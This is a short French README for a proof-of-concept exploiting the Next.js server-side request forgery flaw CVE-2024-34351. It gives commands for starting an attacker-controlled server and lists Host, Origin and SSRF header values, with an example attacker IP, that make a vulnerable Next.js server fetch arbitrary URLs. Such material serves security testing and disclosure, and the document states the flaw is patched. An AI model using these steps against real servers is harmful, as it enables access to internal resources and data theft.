
PoC pour une exploitation complète de la SSRF NextJS (CVE-2024-34351)
PoC pour une exploitation complète de la SSRF de NextJS. Un attaquant peut obtenir le contenu de n'importe quel site Web depuis le serveur Next.js en utilisant la vulnérabilité CVE-2024-34351.
Cette vulnérabilité est corrigée dans [email protected].
deno run --allow-net --allow-read attacker-server.ts
python3 attacker-server.py
Host vers le serveur de l'attaquant. (par ex. Host: 192.198.0.144:8000)Origin vers le serveur de l'attaquant. (par ex. Origin: http://192.198.0.144:8000/)SSRF pour spécifier où rediriger. (par ex. SSRF: http://example.com/test)